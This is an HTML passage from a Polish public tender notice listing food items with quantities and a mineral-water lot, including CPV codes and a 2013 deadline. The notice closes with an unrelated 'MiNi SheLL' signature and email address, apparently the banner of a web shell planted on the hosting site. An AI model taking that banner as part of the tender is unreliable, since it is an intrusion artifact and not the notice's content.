-300szt.;soczki owocowe 100% w op.0,2 -500szt.;szczaw konserwowy op.słoik 350g.-100szt.;sól kamienna jodowana op.1kg.-100szt.;oregano op.10g -30szt.;tymianek op.10g-30szt.;proszek do pieczenia op.15g- 25 szt. wiórki kokosowe op.100g-5szt.;ziele angielskie op.15g.-30szt.;przyprawa warzywna do potraw -sucha -warzywa suszona 15,5% op.200-220g -10szt.;jajo czekoladowe sztuka 20g.-200szt.;przyprawa w płynie 1l.- 6szt.;zioła do drobiu mieszanka rozmarynu,bazylii,majeranku,mięty,tymianku,szałwii,cebula i czosnek op.35g- 10szt.;pianka w czekoladzie op.500g.- 150 szt.;batonik czekoladowy szt50g.- 200szt.; czekolada szt.25-30g.- 250szt.; cukierki miękkie op.1kg.- 6 kg.; ciastka op.25-35g. - 210 szt.;owoce suszone-chipsy op.10-20g. 250szt.;żelki op.10-20g.- 250 szt.;rosół z kury bez glitaminianu sodu op.0,9 kg.- 10szt.,rosół jarzynowy bez glutaminianu sodu op.0.9kg. -10szt., galaretka owocowa w pojemnikach 175g. - 600szt.;lizak owocowy z witaminami 80g.- 350 szt.; przyprawa do drobiu bez glutaminianu sodu op.0,5 kg - 10 szt.; kasza jaglana op1kg.-20 kg.;posypka do ciast różne rodzaje 35g - 10 szt.;rogalik z nadzieniem  op.55g - 300szt.; paluszki z makiem,sezamem lub solą op.70g - 100szt.; wafle ryżowe z orkiszem op.100g - 100szt.,pierniczki nadziewane w czekoladzie op.0,5-1,5kg - 30kg.;kuleczki kokosowe białe op.200g.-110 szt., układanka świąteczno-adwentowa z czekoladek 200g.- 110szt.;żelatyna spożywcza op.50g. - 10 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> WODA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> woda mineralna w butlach o poj.19l - 150szt,;woda mineralna o poj.1,5l - 30szt.;woda mineralna o poj.0,5l - 101szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.11.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com